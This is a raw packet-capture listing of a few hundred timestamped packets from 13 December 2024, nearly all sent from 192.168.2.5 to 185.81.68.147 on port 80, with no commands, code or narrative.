                                                                                                                                                                Dec 13, 2024 01:37:35.880723000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880740881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880762100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880778074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880793095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880815029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880834103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880961895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880975008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.880999088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881021976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881042957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881056070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881078005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881094933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881227016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881242990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881264925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881278038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881299973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881318092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881335974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881364107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881386995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881445885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881477118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881495953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881511927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881531954 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881546974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881575108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881589890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881609917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881623983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881647110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881674051 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881688118 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881709099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881724119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881746054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881804943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881830931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881844997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881865978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881881952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881906986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881922960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881944895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881958961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.881977081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882144928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882174969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882189035 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882210016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882222891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882251978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882265091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882287979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882302046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882323980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882344961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882369041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882381916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882394075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882410049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882437944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882455111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882741928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882772923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882787943 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882813931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882828951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882848978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882863045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882885933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882909060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882931948 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882946968 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882960081 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.882986069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883008957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883025885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883162022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883176088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883199930 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883219957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883239031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883253098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883275986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883290052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883322001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883336067 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883353949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883368015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883385897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883402109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883424997 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883439064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883460999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883475065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883496046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883510113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883533001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883547068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883574963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883584023 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883596897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883624077 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883728027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883862019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883878946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883898973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883913994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883934975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883948088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883975983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.883989096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884013891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884028912 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884051085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884074926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884088993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884110928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884124994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884149075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884165049 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884234905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884248972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884272099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884285927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884311914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884325027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884351969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884366989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884391069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884444952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884473085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884486914 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884509087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884521961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884547949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884571075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884584904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884605885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884619951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884645939 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884660959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884684086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884700060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884720087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884746075 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884759903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884783983 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884798050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884819031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884841919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884855032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884876966 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884891987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884908915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884968042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.884999037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885015011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885039091 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885054111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885081053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885097027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885118961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885132074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885153055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885171890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885195017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885207891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885229111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885241985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885268927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885282040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885406017 CET191249738185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:35.885464907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885481119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885505915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885525942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885549068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885562897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885579109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885595083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885622025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885642052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885652065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885668993 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885685921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885711908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885729074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885756969 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885771990 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885788918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885816097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885829926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885853052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885867119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885893106 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885915995 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885931015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885951996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885966063 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.885987043 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886010885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886024952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886049032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886064053 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886168957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886193991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886209011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886226892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886240959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886267900 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886291027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886305094 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886327028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886341095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886406898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886430979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886452913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886466980 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886485100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886498928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886526108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886540890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886594057 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886624098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886637926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886658907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886674881 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886696100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886709929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886729002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886751890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886769056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886790991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886804104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886825085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886843920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886868000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886883020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886907101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886920929 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886945963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886960030 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886981964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.886997938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887022972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887041092 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887068033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887136936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887136936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887152910 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887182951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887198925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887219906 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887233973 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887254953 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887270927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887295961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887310982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887330055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887345076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887368917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887389898 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887403965 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887422085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887435913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887468100 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887481928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887645006 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887676001 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887691021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887723923 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887737989 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887759924 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887774944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887795925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887814045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887835979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887854099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887873888 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887887955 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887916088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887932062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887955904 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887969971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.887991905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888006926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888029099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888044119 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888061047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888075113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888099909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888118982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888142109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:35.888159037 CET4977580192.168.2.5185.81.68.147
